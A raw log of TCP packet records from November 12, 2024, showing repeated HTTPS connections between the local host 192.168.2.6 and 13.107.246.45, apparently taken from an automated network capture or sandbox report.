                                                        Nov 12, 2024 16:27:38.482388973 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.482435942 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.482815027 CET49922443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.482827902 CET4434992213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.489041090 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.489073038 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.489295959 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.489559889 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.489573002 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.538430929 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.538897991 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.538932085 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.539674044 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.539680958 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.672189951 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.672722101 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.672765017 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.672797918 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.673037052 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.673336029 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.673353910 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.673381090 CET49923443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.673387051 CET4434992313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.680171013 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.680216074 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:38.680329084 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.684175014 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:38.684191942 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.255522966 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.256165981 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.256175995 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.256510019 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.256516933 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.391239882 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.391807079 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.391881943 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.392138958 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.392158031 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.392169952 CET49924443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.392175913 CET4434992413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.396163940 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.396186113 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.396389008 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.396518946 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.396529913 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.417503119 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.418093920 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.418122053 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.418622971 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.418628931 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.549460888 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.549482107 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.549515963 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.549554110 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.549772024 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.549772024 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.549978018 CET49925443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.550000906 CET4434992513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.552345991 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.552371025 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:39.552485943 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.552624941 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:39.552640915 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.129822969 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.130337954 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.130347013 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.130863905 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.130867958 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.259556055 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.260143995 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.260225058 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.260245085 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.260257959 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.260281086 CET49926443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.260286093 CET4434992613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.263159990 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.263220072 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.263282061 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.263427973 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.263442039 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.481937885 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.482486963 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.482522011 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.482973099 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.482978106 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.618547916 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.618609905 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.619631052 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.619734049 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.619755030 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.619781971 CET49927443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.619788885 CET4434992713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.624171019 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.624216080 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.628283978 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.628410101 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.628431082 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.998368025 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.999145985 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.999209881 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:40.999633074 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:40.999639034 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.079479933 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.080512047 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.080512047 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.080553055 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.080559015 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.129514933 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.129966974 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.130062103 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.130062103 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.130116940 CET49928443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.130142927 CET4434992813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.132888079 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.132914066 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.133119106 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.133260965 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.133274078 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.397504091 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.398179054 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.398202896 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.398535013 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.398542881 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.758423090 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.758486986 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.758599043 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.758776903 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.758795023 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.758816957 CET49929443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.758822918 CET4434992913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.762248993 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.762265921 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.762327909 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.762526035 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.762541056 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.894892931 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.895389080 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.895420074 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:41.895970106 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:41.895976067 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.025675058 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.026249886 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.026314974 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.026356936 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.026375055 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.026388884 CET49930443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.026393890 CET4434993013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.029275894 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.029304028 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.029388905 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.029546022 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.029553890 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.502914906 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.503875971 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.503950119 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.504935980 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.504950047 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.636816025 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.637415886 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.637460947 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.637577057 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.637577057 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.637686968 CET49931443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.637722969 CET4434993113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.644174099 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.644232988 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.648360968 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.648546934 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.648569107 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.765595913 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.766407013 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.766433954 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.768173933 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.768179893 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.900919914 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.901213884 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.901468992 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.901565075 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.901565075 CET49932443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.901582003 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.901595116 CET4434993213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.908165932 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.908191919 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:42.912266016 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.912532091 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:42.912543058 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.084755898 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.084785938 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.084840059 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.084897995 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.084955931 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.086095095 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.086117983 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.086149931 CET49888443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.086154938 CET4434988813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.092176914 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.092241049 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.096285105 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.096582890 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.096606970 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.368361950 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.372638941 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.372673988 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.373209000 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.373214960 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.503767967 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.503799915 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.503849983 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.503884077 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.503998995 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.504555941 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.504585028 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.504616022 CET49933443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.504621029 CET4434993313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.520195007 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.520327091 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.525723934 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.525723934 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.525826931 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.673482895 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.677840948 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.677853107 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.681663990 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.681669950 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.836358070 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.836432934 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.836524963 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.836756945 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.836756945 CET49934443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.836774111 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.836781979 CET4434993413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.844723940 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.845410109 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.845458031 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.845509052 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.849896908 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.849915981 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.852252007 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.852257013 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.856275082 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.856293917 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.983390093 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.983776093 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.983815908 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.983825922 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.983844995 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.983886003 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.995620012 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.995630980 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:43.995661020 CET49935443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:43.995665073 CET4434993513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.011094093 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.011138916 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.011200905 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.012149096 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.012161970 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.277057886 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.278398991 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.278448105 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.279932022 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.279937983 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.565557003 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.565635920 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.565711975 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.566312075 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.566313028 CET49936443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.566369057 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.566382885 CET4434993613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.572976112 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.573024988 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.573086977 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.573775053 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.573791981 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.695797920 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.702919960 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.702991009 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.718898058 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.718928099 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.750410080 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.766194105 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.766280890 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.776273966 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.776300907 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.853302956 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.853338957 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.853389978 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.853442907 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.854152918 CET49937443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.854177952 CET4434993713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.859458923 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.859507084 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.859720945 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.860013962 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.860022068 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.903207064 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.903574944 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.903642893 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.903759956 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.903784037 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.903799057 CET49938443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.903805017 CET4434993813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.907660961 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.907700062 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:44.907907009 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.908122063 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:44.908132076 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.509008884 CET49883443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.515856028 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.515907049 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.515966892 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.516927958 CET49942443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.516938925 CET4434994213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.668277025 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.668930054 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.668999910 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.669982910 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.670001030 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.795492887 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.803384066 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.803495884 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.803529978 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.803586006 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.803603888 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.803656101 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.803690910 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.804177999 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.804542065 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.804841995 CET49941443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.804857016 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.805547953 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.805574894 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.818715096 CET49940443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.818723917 CET4434994013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.830657959 CET49939443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.830683947 CET4434993913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.838813066 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.838871956 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.838982105 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.840018988 CET49943443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:45.840033054 CET4434994313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.929164886 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.929523945 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.929563046 CET4434994113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:45.929584980 CET49941443192.168.2.613.107.246.45
